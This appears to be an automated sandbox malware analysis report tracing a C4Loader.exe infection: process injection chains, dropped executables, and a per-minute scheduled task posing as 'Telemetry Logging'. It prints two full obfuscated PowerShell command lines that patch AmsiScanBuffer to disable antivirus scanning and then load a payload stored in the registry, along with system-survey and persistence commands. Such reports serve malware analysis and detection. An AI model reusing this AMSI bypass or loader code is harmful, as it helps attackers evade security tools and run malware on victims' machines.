  PID 4892 wrote to memory of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
  PID 2336 wrote to memory of 212 | 2336 | RegSvcs.exe | powershell.exe
  PID 2336 wrote to memory of 212 | 2336 | RegSvcs.exe | powershell.exe
  PID 2336 wrote to memory of 212 | 2336 | RegSvcs.exe | powershell.exe
  PID 212 wrote to memory of 4524 | 212 | powershell.exe | C4Loader.exe
  PID 212 wrote to memory of 4524 | 212 | powershell.exe | C4Loader.exe
  PID 212 wrote to memory of 4524 | 212 | powershell.exe | C4Loader.exe
  PID 212 wrote to memory of 4900 | 212 | powershell.exe | new2.exe
  PID 212 wrote to memory of 4900 | 212 | powershell.exe | new2.exe
  PID 212 wrote to memory of 2864 | 212 | powershell.exe | SysApp.exe
  PID 212 wrote to memory of 2864 | 212 | powershell.exe | SysApp.exe
  PID 212 wrote to memory of 2864 | 212 | powershell.exe | SysApp.exe
  PID 212 wrote to memory of 2072 | 212 | powershell.exe | SmartDefRun.exe
  PID 212 wrote to memory of 2072 | 212 | powershell.exe | SmartDefRun.exe
  PID 4900 wrote to memory of 4616 | 4900 | new2.exe | wmic.exe
  PID 4900 wrote to memory of 4616 | 4900 | new2.exe | wmic.exe
  PID 4900 wrote to memory of 3876 | 4900 | new2.exe | cmd.exe
  PID 4900 wrote to memory of 3876 | 4900 | new2.exe | cmd.exe
  PID 3876 wrote to memory of 5032 | 3876 | cmd.exe | WMIC.exe
  PID 3876 wrote to memory of 5032 | 3876 | cmd.exe | WMIC.exe
  PID 4900 wrote to memory of 4848 | 4900 | new2.exe | cmd.exe
  PID 4900 wrote to memory of 4848 | 4900 | new2.exe | cmd.exe
  PID 4848 wrote to memory of 3632 | 4848 | cmd.exe | WMIC.exe
  PID 4848 wrote to memory of 3632 | 4848 | cmd.exe | WMIC.exe
  PID 4408 wrote to memory of 1904 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 1904 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 3988 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 3988 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 2312 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 2312 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 3376 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 3376 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 2176 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 2176 | 4408 | cmd.exe | sc.exe
  PID 4408 wrote to memory of 1548 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 1548 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 2128 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 2128 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 4044 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 4044 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 1956 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 1956 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 4468 | 4408 | cmd.exe | reg.exe
  PID 4408 wrote to memory of 4468 | 4408 | cmd.exe | reg.exe
  PID 2072 wrote to memory of 3864 | 2072 | SmartDefRun.exe | dialer.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 5072 wrote to memory of 4716 | 5072 | powershell.EXE | dllhost.exe
  PID 4716 wrote to memory of 608 | 4716 | dllhost.exe | winlogon.exe
  PID 4716 wrote to memory of 660 | 4716 | dllhost.exe | lsass.exe
  PID 4716 wrote to memory of 940 | 4716 | dllhost.exe | svchost.exe
  PID 4716 wrote to memory of 1012 | 4716 | dllhost.exe | dwm.exe
  PID 4716 wrote to memory of 444 | 4716 | dllhost.exe | svchost.exe
  PID 4716 wrote to memory of 672 | 4716 | dllhost.exe | svchost.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\lsass.exe (depth 1)
  command line: C:\Windows\system32\lsass.exe

C:\Windows\system32\winlogon.exe (depth 1)
  command line: winlogon.exe

C:\Windows\system32\dwm.exe (depth 2)
  command line: "dwm.exe"

C:\Windows\System32\dllhost.exe (depth 2)
  command line: C:\Windows\System32\dllhost.exe /Processid:{17ef512c-24b5-4767-9aa7-f03356067398}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

C:\Windows\system32\svchost.exe (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory

C:\Windows\system32\taskhostw.exe (depth 2)
  command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DLkuzxpiwtMo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XggOdaduqXRUQk,[Parameter(Position=1)][Type]$nfmoAraTpC)$oqNUgFKcSVN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+'l'+'e'+''+'d'+''+[Char](44)+'A'+'n'+'s'+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+'t'+'o'+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$oqNUgFKcSVN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XggOdaduqXRUQk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$oqNUgFKcSVN.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+''+
[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+'a'+[Char](108)+'',$nfmoAraTpC,$XggOdaduqXRUQk).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $oqNUgFKcSVN.CreateType();}$wPJbanBgSZvGk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+'W'+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'w'+'P'+''+[Char](74)+''+[Char](98)+''+'a'+'n'+[Char](66)+'g'+[Char](83)+''+[Char](90)+''+'v'+''+'G'+'k');$MmewoHmCKMDcqw=$wPJbanBgSZvGk.GetMethod(''+[Char](77)+''+[Char](109)+''+[Char](101)+''+'w'+'oHm'+'C'+''+[Char](75)+''+[Char](77)+''+[Char](68)+''+[Char](99)+''+[Char](113)+''+[Char](119)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GkxdnnHWwGBFWcLtjmU=DLkuzxpiwtMo @([String])([IntPtr]);$JgYCiRduopqWbPjCDXmkhB=DLkuzxpiwtMo 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lChRAAsfBzV=$wPJbanBgSZvGk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$tfaaJlsLQegmFT=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'a'+[Char](114)+'yA')));$qNMeBJomjoRZIOYmt=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$sSCAUEk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tfaaJlsLQegmFT,$GkxdnnHWwGBFWcLtjmU).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$GKDuPhgCSaxJJoCrS=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$sSCAUEk,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$VnzVrGVOha=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,4,[ref]$VnzVrGVOha);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$GKDuPhgCSaxJJoCrS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,0x20,[ref]$VnzVrGVOha);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+'i'+'a'+''+'l'+'e'+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe (depth 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lUMyxnEmdpes{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xokQuBiuYyuHOx,[Parameter(Position=1)][Type]$JRWbhSGzjC)$tpYAgLqdCQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+'o'+'r'+''+'y'+''+'M'+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+'led'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'uto'+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$tpYAgLqdCQc.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$xokQuBiuYyuHOx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$tpYAgLqdCQc.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Cha
r](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JRWbhSGzjC,$xokQuBiuYyuHOx).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $tpYAgLqdCQc.CreateType();}$kZIqmrxZnntms=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+'em'+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+'o'+''+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+'k'+'ZI'+'q'+''+'m'+''+[Char](114)+''+[Char](120)+'Znn'+[Char](116)+''+[Char](109)+''+[Char](115)+'');$DlaEXldVDwkgwK=$kZIqmrxZnntms.GetMethod(''+[Char](68)+''+[Char](108)+''+'a'+''+[Char](69)+''+[Char](88)+'l'+'d'+'V'+[Char](68)+'w'+'k'+''+[Char](103)+''+[Char](119)+'K',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wsqHfBvvsUVVNrpgllh=lUMyxnEmdpes @([String])([IntPtr]);$urMJHSoxhPbQxyNtWxgTtK=lUMyxnEmdpes 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UvheDItPyQA=$kZIqmrxZnntms.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+'eH'+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$nuGiFVUpuhLExh=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+'r'+'y'+'A'+'')));$hxVzCbsBiJdyqmTUF=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$WyyYQyN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nuGiFVUpuhLExh,$wsqHfBvvsUVVNrpgllh).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$oUfgZrYQkrNpmoMhm=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$WyyYQyN,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$RbzvxCRaEG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,4,[ref]$RbzvxCRaEG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oUfgZrYQkrNpmoMhm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,0x20,[ref]$RbzvxCRaEG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Nu
ll)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe (depth 2)
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
- Executes dropped EXE
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
-
C:\Windows\sysmon.exe (depth 1)
  C:\Windows\sysmon.exe
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
-
C:\Windows\system32\sihost.exe (depth 1)
  sihost.exe
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalService -s W32Time
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4892 -ip 4892
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 452 -p 3524 -ip 3524
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 3656 -ip 3656
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 540 -p 2000 -ip 2000
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 4776 -ip 4776
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 524 -p 2416 -ip 2416
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 608 -p 4772 -ip 4772
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 612 -p 2464 -ip 2464
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 520 -p 216 -ip 216
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 608 -p 3632 -ip 3632
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 5052 -ip 5052
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 4160 -ip 4160
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 4188 -ip 4188
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 3760 -ip 3760
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 3820 -ip 3820
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 624 -p 2656 -ip 2656
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 2428 -ip 2428
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k netsvcs -p
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\system32\SppExtComObj.exe (depth 1)
  C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 3656 -s 404
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 3524 -s 856
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\Explorer.EXE (depth 1)
  C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe (depth 2)
  "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 3)
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe (depth 5)
  "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe (depth 5)
  "C:\Users\Admin\AppData\Local\Temp\new2.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe (depth 6)
  wmic os get Caption
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe (depth 6)
  cmd /C "wmic path win32_VideoController get name"
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe (depth 7)
  wmic path win32_VideoController get name
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe (depth 6)
  cmd /C "wmic cpu get name"
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe (depth 7)
  wmic cpu get name
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe (depth 5)
  "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe (depth 6)
  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe (depth 7)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe (depth 5)
  "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
